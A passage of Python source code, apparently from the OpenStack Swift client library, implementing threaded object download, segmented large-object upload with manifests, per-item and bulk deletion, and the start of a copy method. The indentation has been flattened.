except ClientException as err:
if err.http_status != 404:
raise
raise SwiftError('Account not found', exc=err)
elif objects is None:
if '/' in container:
raise SwiftError('\'/\' in container name',
container=container)
for res in self._download_container(container, options):
yield res
else:
if '/' in container:
raise SwiftError('\'/\' in container name',
container=container)
if options['out_file'] and len(objects) > 1:
options['out_file'] = None
o_downs = [
self.thread_manager.object_dd_pool.submit(
self._download_object_job, container, obj, options
) for obj in objects
]
for o_down in interruptable_as_completed(o_downs):
yield o_down.result()
def _download_object_job(self, conn, container, obj, options):
out_file = options['out_file']
results_dict = {}
req_headers = split_headers(options['header'], '')
pseudodir = False
path = join(container, obj) if options['yes_all'] else obj
path = path.lstrip(os_path_sep)
options['skip_identical'] = (options['skip_identical'] and
out_file != '-')
if options['prefix'] and options['remove_prefix']:
path = path[len(options['prefix']):].lstrip('/')
if options['out_directory']:
path = os.path.join(options['out_directory'], path)
if options['skip_identical']:
filename = out_file if out_file else path
try:
fp = open(filename, 'rb', DISK_BUFFER)
except IOError:
pass
else:
with fp:
md5sum = md5()
while True:
data = fp.read(DISK_BUFFER)
if not data:
break
md5sum.update(data)
req_headers['If-None-Match'] = md5sum.hexdigest()
try:
start_time = time()
get_args = {'resp_chunk_size': DISK_BUFFER,
'headers': req_headers,
'response_dict': results_dict}
if options['skip_identical']:
# Assume the file is a large object; if we're wrong, the query
# string is ignored and the If-None-Match header will trigger
# the behavior we want
get_args['query_string'] = 'multipart-manifest=get'
try:
headers, body = conn.get_object(container, obj, **get_args)
except ClientException as e:
if not options['skip_identical']:
raise
if e.http_status != 304: # Only handling Not Modified
raise
headers = results_dict['headers']
if 'x-object-manifest' in headers:
# DLO: most likely it has more than one page worth of
# segments and we have an empty file locally
body = []
elif config_true_value(headers.get('x-static-large-object')):
# SLO: apparently we have a copy of the manifest locally?
# provide no chunking data to force a fresh download
body = [b'[]']
else:
# Normal object: let it bubble up
raise
if options['skip_identical']:
if config_true_value(headers.get('x-static-large-object')) or \
'x-object-manifest' in headers:
# The request was chunked, so stitch it back together
chunk_data = self._get_chunk_data(conn, container, obj,
headers, b''.join(body))
else:
chunk_data = None
if chunk_data is not None:
if self._is_identical(chunk_data, filename):
raise ClientException('Large object is identical',
http_status=304)
# Large objects are different; start the real download
del get_args['query_string']
get_args['response_dict'].clear()
headers, body = conn.get_object(container, obj, **get_args)
headers_receipt = time()
obj_body = _SwiftReader(path, body, headers,
options.get('checksum', True))
no_file = options['no_download']
if out_file == "-" and not no_file:
res = {
'action': 'download_object',
'container': container,
'object': obj,
'path': path,
'pseudodir': pseudodir,
'contents': obj_body
}
return res
fp = None
try:
content_type = headers.get('content-type', '').split(';', 1)[0]
if content_type in KNOWN_DIR_MARKERS:
make_dir = not no_file and out_file != "-"
if make_dir and not isdir(path):
mkdirs(path)
else:
make_dir = not (no_file or out_file)
if make_dir:
dirpath = dirname(path)
if dirpath and not isdir(dirpath):
mkdirs(dirpath)
if not no_file:
if out_file:
fp = open(out_file, 'wb', DISK_BUFFER)
else:
if basename(path):
fp = open(path, 'wb', DISK_BUFFER)
else:
pseudodir = True
for chunk in obj_body:
if fp is not None:
fp.write(chunk)
finish_time = time()
finally:
bytes_read = obj_body.bytes_read()
if fp is not None:
fp.close()
if ('x-object-meta-mtime' in headers and not no_file
and not options['ignore_mtime']):
try:
mtime = float(headers['x-object-meta-mtime'])
except ValueError:
pass # no real harm; couldn't trust it anyway
else:
if options['out_file']:
utime(options['out_file'], (mtime, mtime))
else:
utime(path, (mtime, mtime))
res = {
'action': 'download_object',
'success': True,
'container': container,
'object': obj,
'path': path,
'pseudodir': pseudodir,
'start_time': start_time,
'finish_time': finish_time,
'headers_receipt': headers_receipt,
'auth_end_time': conn.auth_end_time,
'read_length': bytes_read,
'attempts': conn.attempts,
'response_dict': results_dict
}
return res
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res = {
'action': 'download_object',
'container': container,
'object': obj,
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': results_dict,
'path': path,
'pseudodir': pseudodir,
'attempts': conn.attempts
}
return res
def _submit_page_downloads(self, container, page_generator, options):
try:
list_page = next(page_generator)
except StopIteration:
return None
if list_page["success"]:
objects = [o["name"] for o in list_page["listing"]]
if options["shuffle"]:
shuffle(objects)
o_downs = [
self.thread_manager.object_dd_pool.submit(
self._download_object_job, container, obj, options
) for obj in objects
]
return o_downs
else:
raise list_page["error"]
def _download_container(self, container, options):
_page_generator = self.list(container=container, options=options)
try:
next_page_downs = self._submit_page_downloads(
container, _page_generator, options
)
except ClientException as err:
if err.http_status != 404:
raise
raise SwiftError(
'Container %r not found' % container,
container=container, exc=err
)
error = None
while next_page_downs:
page_downs = next_page_downs
next_page_downs = None
# Start downloading the next page of list results when
# we have completed 80% of the previous page
next_page_triggered = False
next_page_trigger_point = 0.8 * len(page_downs)
page_results_yielded = 0
for o_down in interruptable_as_completed(page_downs):
yield o_down.result()
# Do we need to start the next set of downloads yet?
if not next_page_triggered:
page_results_yielded += 1
if page_results_yielded >= next_page_trigger_point:
try:
next_page_downs = self._submit_page_downloads(
container, _page_generator, options
)
except ClientException as err:
# Allow the current page to finish downloading
logger.exception(err)
error = err
except Exception:
# Something unexpected went wrong - cancel
# remaining downloads
for _d in page_downs:
_d.cancel()
raise
finally:
# Stop counting and testing
next_page_triggered = True
if error:
raise error
# Upload related methods
#
def upload(self, container, objects, options=None):
"""
Upload a list of objects to a given container.
:param container: The container (or pseudo-folder path) to put the
uploads into.
:param objects: A list of file/directory names (strings) or
SwiftUploadObject instances containing a source for the
created object, an object name, and an options dict
(can be None) to override the options for that
individual upload operation::
[
'/path/to/file',
SwiftUploadObject('/path', object_name='obj1'),
...
]
The options dict is as described below.
The SwiftUploadObject source may be one of:
* A file-like object (with a read method)
* A string containing the path to a local
file or directory
* None, to indicate that we want an empty object
:param options: A dictionary containing options to override the global
options specified during the service object creation.
These options are applied to all upload operations
performed by this call, unless overridden on a per
object basis. Possible options are given below::
{
'meta': [],
'header': [],
'segment_size': None,
'use_slo': False,
'segment_container': None,
'leave_segments': False,
'changed': None,
'skip_identical': False,
'fail_fast': False,
'dir_marker': False # Only for None sources
}
:returns: A generator for returning the results of the uploads.
:raises SwiftError:
:raises ClientException:
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
try:
segment_size = int(0 if options['segment_size'] is None else
options['segment_size'])
except ValueError:
raise SwiftError('Segment size should be an integer value')
# In case we have a pseudo-folder path for the <container> arg, derive
# the container name from the top path and prepend the rest to
# the object name (same as passing --object-name).
container, _sep, pseudo_folder = container.partition('/')
# Try to create the container, just in case it doesn't exist. If this
# fails, it might just be because the user doesn't have container PUT
# permissions, so we'll ignore any error. If there's really a problem,
# it'll surface on the first object PUT.
policy_header = {}
_header = split_headers(options["header"])
if POLICY in _header:
policy_header[POLICY] = \
_header[POLICY]
create_containers = [
self.thread_manager.container_pool.submit(
self._create_container_job, container, headers=policy_header)
]
# wait for first container job to complete before possibly attempting
# segment container job because segment container job may attempt
# to HEAD the first container
for r in interruptable_as_completed(create_containers):
res = r.result()
yield res
if segment_size:
seg_container = container + '_segments'
if options['segment_container']:
seg_container = options['segment_container']
if seg_container != container:
if not policy_header:
# Since no storage policy was specified on the command
# line, rather than just letting swift pick the default
# storage policy, we'll try to create the segments
# container with the same policy as the upload container
create_containers = [
self.thread_manager.container_pool.submit(
self._create_container_job, seg_container,
policy_source=container
)
]
else:
create_containers = [
self.thread_manager.container_pool.submit(
self._create_container_job, seg_container,
headers=policy_header
)
]
for r in interruptable_as_completed(create_containers):
res = r.result()
yield res
# We maintain a results queue here and a separate thread to monitor
# the futures because we want to get results back from potential
# segment uploads too
rq = Queue()
file_jobs = {}
upload_objects = self._make_upload_objects(objects, pseudo_folder)
for upload_object in upload_objects:
s = upload_object.source
o = upload_object.object_name
o_opts = upload_object.options
details = {'action': 'upload', 'container': container}
if o_opts is not None:
object_options = deepcopy(options)
object_options.update(o_opts)
else:
object_options = options
if hasattr(s, 'read'):
# We've got a file like object to upload to o
file_future = self.thread_manager.object_uu_pool.submit(
self._upload_object_job, container, s, o, object_options
)
details['file'] = s
details['object'] = o
file_jobs[file_future] = details
elif s is not None:
# We've got a path to upload to o
details['path'] = s
details['object'] = o
if isdir(s):
dir_future = self.thread_manager.object_uu_pool.submit(
self._create_dir_marker_job, container, o,
object_options, path=s
)
file_jobs[dir_future] = details
else:
try:
stat(s)
file_future = \
self.thread_manager.object_uu_pool.submit(
self._upload_object_job, container, s, o,
object_options, results_queue=rq
)
file_jobs[file_future] = details
except OSError as err:
# Avoid tying up threads with jobs that will fail
traceback, err_time = report_traceback()
logger.exception(err)
res = {
'action': 'upload_object',
'container': container,
'object': o,
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'path': s
}
rq.put(res)
else:
# Create an empty object (as a dir marker if is_dir)
details['file'] = None
details['object'] = o
if object_options['dir_marker']:
dir_future = self.thread_manager.object_uu_pool.submit(
self._create_dir_marker_job, container, o,
object_options
)
file_jobs[dir_future] = details
else:
file_future = self.thread_manager.object_uu_pool.submit(
self._upload_object_job, container, StringIO(),
o, object_options
)
file_jobs[file_future] = details
# Start a thread to watch for upload results
Thread(
target=self._watch_futures, args=(file_jobs, rq)
).start()
# yield results as they become available, including those from
# segment uploads.
res = get_from_queue(rq)
cancelled = False
while res is not None:
yield res
if not res['success']:
if not cancelled and options['fail_fast']:
cancelled = True
for f in file_jobs:
f.cancel()
res = get_from_queue(rq)
@staticmethod
def _make_upload_objects(objects, pseudo_folder=''):
upload_objects = []
for o in objects:
if isinstance(o, string_types):
obj = SwiftUploadObject(o, urljoin(pseudo_folder,
o.lstrip('/')))
upload_objects.append(obj)
elif isinstance(o, SwiftUploadObject):
o.object_name = urljoin(pseudo_folder, o.object_name)
upload_objects.append(o)
else:
raise SwiftError(
"The upload operation takes only strings or "
"SwiftUploadObjects as input",
obj=o)
return upload_objects
@staticmethod
def _create_container_job(
conn, container, headers=None, policy_source=None):
"""
Create a container using the given connection
:param conn: The swift connection used for requests.
:param container: The container name to create.
:param headers: An optional dict of headers for the
put_container request.
:param policy_source: An optional name of a container whose policy we
should duplicate.
:return: A dict containing the results of the operation.
"""
res = {
'action': 'create_container',
'container': container,
'headers': headers
}
create_response = {}
try:
if policy_source is not None:
_meta = conn.head_container(policy_source)
if 'x-storage-policy' in _meta:
policy_header = {
POLICY: _meta.get('x-storage-policy')
}
if headers is None:
headers = policy_header
else:
headers.update(policy_header)
conn.put_container(
container, headers, response_dict=create_response
)
res.update({
'success': True,
'response_dict': create_response
})
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': create_response
})
return res
@staticmethod
def _create_dir_marker_job(conn, container, obj, options, path=None):
res = {
'action': 'create_dir_marker',
'container': container,
'object': obj,
'path': path
}
results_dict = {}
if obj.startswith('./') or obj.startswith('.\\'):
obj = obj[2:]
if obj.startswith('/'):
obj = obj[1:]
if path is not None:
put_headers = {'x-object-meta-mtime': "%f" % getmtime(path)}
else:
put_headers = {'x-object-meta-mtime': "%f" % round(time())}
res['headers'] = put_headers
if options['changed']:
try:
headers = conn.head_object(container, obj)
ct = headers.get('content-type', '').split(';', 1)[0]
cl = int(headers.get('content-length'))
et = headers.get('etag')
mt = headers.get('x-object-meta-mtime')
if (ct in KNOWN_DIR_MARKERS and
cl == 0 and
et == EMPTY_ETAG and
mt == put_headers['x-object-meta-mtime']):
res['success'] = True
return res
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
try:
conn.put_object(container, obj, '', content_length=0,
content_type=KNOWN_DIR_MARKERS[0],
headers=put_headers,
response_dict=results_dict)
res.update({
'success': True,
'response_dict': results_dict})
return res
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': results_dict})
return res
@staticmethod
def _upload_segment_job(conn, path, container, segment_name, segment_start,
segment_size, segment_index, obj_name, options,
results_queue=None):
results_dict = {}
if options['segment_container']:
segment_container = options['segment_container']
else:
segment_container = container + '_segments'
res = {
'action': 'upload_segment',
'for_container': container,
'for_object': obj_name,
'segment_index': segment_index,
'segment_size': segment_size,
'segment_location': '/%s/%s' % (segment_container,
segment_name),
'log_line': '%s segment %s' % (obj_name, segment_index),
}
fp = None
try:
fp = open(path, 'rb', DISK_BUFFER)
fp.seek(segment_start)
contents = LengthWrapper(fp, segment_size, md5=options['checksum'])
etag = conn.put_object(
segment_container,
segment_name,
contents,
content_length=segment_size,
content_type='application/swiftclient-segment',
response_dict=results_dict)
if options['checksum'] and etag and etag != contents.get_md5sum():
raise SwiftError('Segment {0}: upload verification failed: '
'md5 mismatch, local {1} != remote {2} '
'(remote segment has not been removed)'
.format(segment_index,
contents.get_md5sum(),
etag))
res.update({
'success': True,
'response_dict': results_dict,
'segment_etag': etag,
'attempts': conn.attempts
})
if results_queue is not None:
results_queue.put(res)
return res
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': results_dict,
'attempts': conn.attempts
})
if results_queue is not None:
results_queue.put(res)
return res
finally:
if fp is not None:
fp.close()
def _get_chunk_data(self, conn, container, obj, headers, manifest=None):
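# Build a list of {'hash': ..., 'bytes': ...} entries describing the object:
# from its DLO segment listing, from its SLO manifest (recursing into
# sub-SLOs), or a single entry for a plain object, so callers can compare it
# against a local file.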
chunks = []
if 'x-object-manifest' in headers:
scontainer, sprefix = headers['x-object-manifest'].split('/', 1)
for part in self.list(scontainer, {'prefix': sprefix}):
if part["success"]:
chunks.extend(part["listing"])
else:
raise part["error"]
elif config_true_value(headers.get('x-static-large-object')):
if manifest is None:
headers, manifest = conn.get_object(
container, obj, query_string='multipart-manifest=get')
manifest = parse_api_response(headers, manifest)
for chunk in manifest:
if chunk.get('sub_slo'):
scont, sobj = chunk['name'].lstrip('/').split('/', 1)
chunks.extend(self._get_chunk_data(
conn, scont, sobj, {'x-static-large-object': True}))
else:
chunks.append(chunk)
else:
chunks.append({'hash': headers.get('etag').strip('"'),
'bytes': int(headers.get('content-length'))})
return chunks
def _is_identical(self, chunk_data, path):
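# Compare the chunk list from _get_chunk_data() against the local file at
# 'path': hash the file in chunk-sized pieces and return True only if every
# chunk's md5 matches and the file has no trailing data.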
if path is None:
return False
try:
fp = open(path, 'rb', DISK_BUFFER)
except IOError:
return False
with fp:
for chunk in chunk_data:
to_read = chunk['bytes']
md5sum = md5()
while to_read:
data = fp.read(min(DISK_BUFFER, to_read))
if not data:
return False
md5sum.update(data)
to_read -= len(data)
if md5sum.hexdigest() != chunk['hash']:
return False
# Each chunk is verified; check that we're at the end of the file
return not fp.read(1)
def _upload_object_job(self, conn, container, source, obj, options,
results_queue=None):
if obj.startswith('./') or obj.startswith('.\\'):
obj = obj[2:]
if obj.startswith('/'):
obj = obj[1:]
res = {
'action': 'upload_object',
'container': container,
'object': obj
}
if hasattr(source, 'read'):
stream = source
path = None
else:
path = source
res['path'] = path
try:
if path is not None:
put_headers = {'x-object-meta-mtime': "%f" % getmtime(path)}
else:
put_headers = {'x-object-meta-mtime': "%f" % round(time())}
res['headers'] = put_headers
# We need to HEAD all objects now in case we're overwriting a
# manifest object and need to delete the old segments
# ourselves.
old_manifest = None
old_slo_manifest_paths = []
new_slo_manifest_paths = set()
segment_size = int(0 if options['segment_size'] is None
else options['segment_size'])
if (options['changed'] or options['skip_identical']
or not options['leave_segments']):
try:
headers = conn.head_object(container, obj)
is_slo = config_true_value(
headers.get('x-static-large-object'))
if options['skip_identical'] or (
is_slo and not options['leave_segments']):
chunk_data = self._get_chunk_data(
conn, container, obj, headers)
if options['skip_identical'] and self._is_identical(
chunk_data, path):
res.update({
'success': True,
'status': 'skipped-identical'
})
return res
cl = int(headers.get('content-length'))
mt = headers.get('x-object-meta-mtime')
if (path is not None and options['changed']
and cl == getsize(path)
and mt == put_headers['x-object-meta-mtime']):
res.update({
'success': True,
'status': 'skipped-changed'
})
return res
if not options['leave_segments']:
old_manifest = headers.get('x-object-manifest')
if is_slo:
for old_seg in chunk_data:
seg_path = old_seg['name'].lstrip('/')
if isinstance(seg_path, text_type):
seg_path = seg_path.encode('utf-8')
old_slo_manifest_paths.append(seg_path)
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
# Merge the command line header options to the put_headers
put_headers.update(split_headers(options['header'], ''))
# Don't do segment job if object is not big enough, and never do
# a segment job if we're reading from a stream - we may fail if we
# go over the single object limit, but this gives us a nice way
# to create objects from memory
if (path is not None and segment_size
and (getsize(path) > segment_size)):
res['large_object'] = True
seg_container = container + '_segments'
if options['segment_container']:
seg_container = options['segment_container']
full_size = getsize(path)
segment_futures = []
segment_pool = self.thread_manager.segment_pool
segment = 0
segment_start = 0
while segment_start < full_size:
if segment_start + segment_size > full_size:
segment_size = full_size - segment_start
if options['use_slo']:
segment_name = '%s/slo/%s/%s/%s/%08d' % (
obj, put_headers['x-object-meta-mtime'],
full_size, options['segment_size'], segment
)
else:
segment_name = '%s/%s/%s/%s/%08d' % (
obj, put_headers['x-object-meta-mtime'],
full_size, options['segment_size'], segment
)
seg = segment_pool.submit(
self._upload_segment_job, path, container,
segment_name, segment_start, segment_size, segment,
obj, options, results_queue=results_queue
)
segment_futures.append(seg)
segment += 1
segment_start += segment_size
segment_results = []
errors = False
exceptions = []
for f in interruptable_as_completed(segment_futures):
try:
r = f.result()
if not r['success']:
errors = True
segment_results.append(r)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
errors = True
exceptions.append((err, traceback, err_time))
if errors:
err = ClientException(
'Aborting manifest creation '
'because not all segments could be uploaded. %s/%s'
% (container, obj))
res.update({
'success': False,
'error': err,
'exceptions': exceptions,
'segment_results': segment_results
})
return res
res['segment_results'] = segment_results
if options['use_slo']:
segment_results.sort(key=lambda di: di['segment_index'])
for seg in segment_results:
seg_loc = seg['segment_location'].lstrip('/')
if isinstance(seg_loc, text_type):
seg_loc = seg_loc.encode('utf-8')
new_slo_manifest_paths.add(seg_loc)
manifest_data = json.dumps([
{
'path': d['segment_location'],
'etag': d['segment_etag'],
'size_bytes': d['segment_size']
} for d in segment_results
])
mr = {}
conn.put_object(
container, obj, manifest_data,
headers=put_headers,
query_string='multipart-manifest=put',
response_dict=mr
)
res['manifest_response_dict'] = mr
else:
new_object_manifest = '%s/%s/%s/%s/%s/' % (
quote(seg_container.encode('utf8')),
quote(obj.encode('utf8')),
put_headers['x-object-meta-mtime'], full_size,
options['segment_size'])
if old_manifest and old_manifest.rstrip('/') == \
new_object_manifest.rstrip('/'):
old_manifest = None
put_headers['x-object-manifest'] = new_object_manifest
mr = {}
conn.put_object(
container, obj, '', content_length=0,
headers=put_headers,
response_dict=mr
)
res['manifest_response_dict'] = mr
else:
res['large_object'] = False
obr = {}
fp = None
try:
if path is not None:
content_length = getsize(path)
fp = open(path, 'rb', DISK_BUFFER)
contents = LengthWrapper(fp,
content_length,
md5=options['checksum'])
else:
content_length = None
contents = ReadableToIterable(stream,
md5=options['checksum'])
etag = conn.put_object(
container, obj, contents,
content_length=content_length, headers=put_headers,
response_dict=obr
)
res['response_dict'] = obr
if (options['checksum'] and
etag and etag != contents.get_md5sum()):
raise SwiftError(
'Object upload verification failed: '
'md5 mismatch, local {0} != remote {1} '
'(remote object has not been removed)'
.format(contents.get_md5sum(), etag))
finally:
if fp is not None:
fp.close()
if old_manifest or old_slo_manifest_paths:
drs = []
delobjsmap = {}
if old_manifest:
scontainer, sprefix = old_manifest.split('/', 1)
sprefix = sprefix.rstrip('/') + '/'
delobjsmap[scontainer] = []
for part in self.list(scontainer, {'prefix': sprefix}):
if not part["success"]:
raise part["error"]
delobjsmap[scontainer].extend(
seg['name'] for seg in part['listing'])
if old_slo_manifest_paths:
for seg_to_delete in old_slo_manifest_paths:
if seg_to_delete in new_slo_manifest_paths:
continue
scont, sobj = \
seg_to_delete.split(b'/', 1)
delobjs_cont = delobjsmap.get(scont, [])
delobjs_cont.append(sobj)
delobjsmap[scont] = delobjs_cont
del_segs = []
for dscont, dsobjs in delobjsmap.items():
for dsobj in dsobjs:
del_seg = self.thread_manager.segment_pool.submit(
self._delete_segment, dscont, dsobj,
results_queue=results_queue
)
del_segs.append(del_seg)
for del_seg in interruptable_as_completed(del_segs):
drs.append(del_seg.result())
res['segment_delete_results'] = drs
# return dict for printing
res.update({
'success': True,
'status': 'uploaded',
'attempts': conn.attempts})
return res
except OSError as err:
traceback, err_time = report_traceback()
logger.exception(err)
if err.errno == ENOENT:
error = SwiftError('Local file %r not found' % path, exc=err)
else:
error = err
res.update({
'success': False,
'error': error,
'traceback': traceback,
'error_timestamp': err_time
})
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
# Delete related methods
#
def delete(self, container=None, objects=None, options=None):
"""
Delete operations on an account, optional container and optional list
of objects.
:param container: The container to delete or delete from.
:param objects: The list of objects to delete.
:param options: A dictionary containing options to override the global
options specified during the service object creation::
{
'yes_all': False,
'leave_segments': False,
'prefix': None,
'header': [],
}
:returns: A generator for returning the results of the delete
operations. Each result yielded from the generator is either
a 'delete_container', 'delete_object', 'delete_segment', or
'bulk_delete' dictionary containing the results of an
individual delete operation.
:raises ClientException:
:raises SwiftError:
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
if container is not None:
if objects is not None:
if options['prefix']:
objects = [obj for obj in objects
if obj.startswith(options['prefix'])]
rq = Queue()
obj_dels = {}
bulk_page_size = self._bulk_delete_page_size(objects)
if bulk_page_size > 1:
page_at_a_time = n_at_a_time(objects, bulk_page_size)
for page_slice in page_at_a_time:
for obj_slice in n_groups(
page_slice,
self._options['object_dd_threads']):
self._bulk_delete(container, obj_slice, options,
obj_dels)
else:
self._per_item_delete(container, objects, options,
obj_dels, rq)
# Start a thread to watch for delete results
Thread(
target=self._watch_futures, args=(obj_dels, rq)
).start()
# yield results as they become available, raising the first
# encountered exception
res = get_from_queue(rq)
while res is not None:
yield res
# Cancel the remaining jobs if necessary
if options['fail_fast'] and not res['success']:
for d in obj_dels.keys():
d.cancel()
res = get_from_queue(rq)
else:
for res in self._delete_container(container, options):
yield res
else:
if objects:
raise SwiftError('Objects specified without container')
if options['prefix']:
raise SwiftError('Prefix specified without container')
if options['yes_all']:
cancelled = False
containers = []
for part in self.list():
if part["success"]:
containers.extend(c['name'] for c in part['listing'])
else:
raise part["error"]
for con in containers:
if cancelled:
break
else:
for res in self._delete_container(
con, options=options):
yield res
# Cancel the remaining container deletes, but yield
# any pending results
if (not cancelled and options['fail_fast']
and not res['success']):
cancelled = True
def _bulk_delete_page_size(self, objects):
'''
Given the iterable 'objects', will return how many items should be
deleted at a time.
:param objects: An iterable that supports 'len()'
:returns: The bulk delete page size (i.e. the max number of
objects that can be bulk deleted at once, as reported by
the cluster). If bulk delete is disabled, return 1
'''
if len(objects) <= 2 * self._options['object_dd_threads']:
# Not many objects; may as well delete one-by-one
return 1
try:
cap_result = self.capabilities()
if not cap_result['success']:
# This shouldn't actually happen, but just in case we start
# being more nuanced about our capabilities result...
return 1
except ClientException:
# Old swift, presumably; assume no bulk middleware
return 1
swift_info = cap_result['capabilities']
if 'bulk_delete' in swift_info:
return swift_info['bulk_delete'].get(
'max_deletes_per_request', 10000)
else:
return 1
def _per_item_delete(self, container, objects, options, rdict, rq):
for obj in objects:
obj_del = self.thread_manager.object_dd_pool.submit(
self._delete_object, container, obj, options,
results_queue=rq
)
obj_details = {'container': container, 'object': obj}
rdict[obj_del] = obj_details
@staticmethod
def _delete_segment(conn, container, obj, results_queue=None):
results_dict = {}
try:
conn.delete_object(container, obj, response_dict=results_dict)
res = {'success': True}
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res = {
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
}
res.update({
'action': 'delete_segment',
'container': container,
'object': obj,
'attempts': conn.attempts,
'response_dict': results_dict
})
if results_queue is not None:
results_queue.put(res)
return res
def _delete_object(self, conn, container, obj, options,
results_queue=None):
_headers = {}
_headers = split_headers(options.get('header', []))
res = {
'action': 'delete_object',
'container': container,
'object': obj
}
try:
old_manifest = None
query_string = None
if not options['leave_segments']:
try:
headers = conn.head_object(container, obj,
headers=_headers)
old_manifest = headers.get('x-object-manifest')
if config_true_value(headers.get('x-static-large-object')):
query_string = 'multipart-manifest=delete'
except ClientException as err:
if err.http_status != 404:
raise
results_dict = {}
conn.delete_object(container, obj,
headers=_headers,
query_string=query_string,
response_dict=results_dict)
if old_manifest:
dlo_segments_deleted = True
segment_pool = self.thread_manager.segment_pool
s_container, s_prefix = old_manifest.split('/', 1)
s_prefix = s_prefix.rstrip('/') + '/'
del_segs = []
for part in self.list(
container=s_container, options={'prefix': s_prefix}):
if part["success"]:
seg_list = [o["name"] for o in part["listing"]]
else:
raise part["error"]
for seg in seg_list:
del_seg = segment_pool.submit(
self._delete_segment, s_container,
seg, results_queue=results_queue
)
del_segs.append(del_seg)
for del_seg in interruptable_as_completed(del_segs):
del_res = del_seg.result()
if not del_res["success"]:
dlo_segments_deleted = False
res['dlo_segments_deleted'] = dlo_segments_deleted
res.update({
'success': True,
'response_dict': results_dict,
'attempts': conn.attempts,
})
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
return res
@staticmethod
def _delete_empty_container(conn, container, options):
results_dict = {}
_headers = {}
_headers = split_headers(options.get('header', []))
try:
conn.delete_container(container, headers=_headers,
response_dict=results_dict)
res = {'success': True}
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res = {
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
}
res.update({
'action': 'delete_container',
'container': container,
'object': None,
'attempts': conn.attempts,
'response_dict': results_dict
})
return res
def _delete_container(self, container, options):
try:
for part in self.list(container=container, options=options):
if not part["success"]:
raise part["error"]
for res in self.delete(
container=container,
objects=[o['name'] for o in part['listing']],
options=options):
yield res
if options['prefix']:
# We're only deleting a subset of objects within the container
return
con_del = self.thread_manager.container_pool.submit(
self._delete_empty_container, container, options
)
con_del_res = get_future_result(con_del)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
con_del_res = {
'action': 'delete_container',
'container': container,
'object': None,
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
}
yield con_del_res
# Bulk methods
#
def _bulk_delete(self, container, objects, options, rdict):
if objects:
bulk_del = self.thread_manager.object_dd_pool.submit(
self._bulkdelete, container, objects, options
)
bulk_details = {'container': container, 'objects': objects}
rdict[bulk_del] = bulk_details
@staticmethod
def _bulkdelete(conn, container, objects, options):
results_dict = {}
try:
headers = {
'Accept': 'application/json',
'Content-Type': 'text/plain',
}
res = {'container': container, 'objects': objects}
objects = [quote(('/%s/%s' % (container, obj)).encode('utf-8'))
for obj in objects]
headers, body = conn.post_account(
headers=headers,
query_string='bulk-delete',
data=b''.join(obj.encode('utf-8') + b'\n' for obj in objects),
response_dict=results_dict)
if body:
res.update({'success': True,
'result': parse_api_response(headers, body)})
else:
res.update({
'success': False,
'error': SwiftError(
'No content received on account POST. '
'Is the bulk operations middleware enabled?')})
except Exception as e:
res.update({'success': False, 'error': e})
res.update({
'action': 'bulk_delete',
'attempts': conn.attempts,
'response_dict': results_dict
})
return res
# Copy related methods
#
def copy(self, container, objects, options=None):
"""
Copy operations on a list of objects in a container. Destination
containers will be created.
:param container: The container from which to copy the objects.
:param objects: A list of object names (strings) or SwiftCopyObject
instances containing an object name and an
options dict (can be None) to override the options for
that individual copy operation::
[
'object_name',
SwiftCopyObject(
'object_name',
options={
'destination': '/container/object',
'fresh_metadata': False,
...
}),
...
]
The options dict is described below.
:param options: A dictionary containing options to override the global
options specified during the service object creation.
These options are applied to all copy operations
performed by this call, unless overridden on a per
object basis.
The options "destination" and "fresh_metadata" do
not need to be set; in this case objects will be
copied onto themselves and metadata will not be
refreshed.
The option "destination" can also be specified in the
format '/container', in which case objects without an
explicit destination will be copied to the destination
/container/original_object_name. A combination of
multiple objects and a destination in the format
'/container/object' is invalid. Possible options are
given below::
{
'meta': [],
'header': [],
'destination': '/container/object',
'fresh_metadata': False,
}
:returns: A generator returning the results of copying the given list
of objects.
:raises SwiftError:
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
# Try to create the container, just in case it doesn't exist. If this
# fails, it might just be because the user doesn't have container PUT
# permissions, so we'll ignore any error. If there's really a problem,
# it'll surface on the first object COPY.
containers = set(
next(p for p in obj.destination.split("/") if p)
for obj in objects
if isinstance(obj, SwiftCopyObject) and obj.destination
)
if options.get('destination'):
destination_split = options['destination'].split('/')
if destination_split[0]:
raise SwiftError("destination must be in format /cont[/obj]")
_str_objs = [
o for o in objects if not isinstance(o, SwiftCopyObject)
]
if len(destination_split) > 2 and len(_str_objs) > 1:
# TODO (clayg): could be useful to copy multiple objects into
# a destination like "/container/common/prefix/for/objects/"
# where the trailing "/" indicates the destination option is a
# prefix!
raise SwiftError("Combination of multiple objects and "
"destination including object is invalid")
if destination_split[-1] == '':
# N.B. this protects the above case
raise SwiftError("destination can not end in a slash")
containers.add(destination_split[1])
policy_header = {}
_header = split_headers(options["header"])
if POLICY in _header:
policy_header[POLICY] = _header[POLICY]
create_containers = [
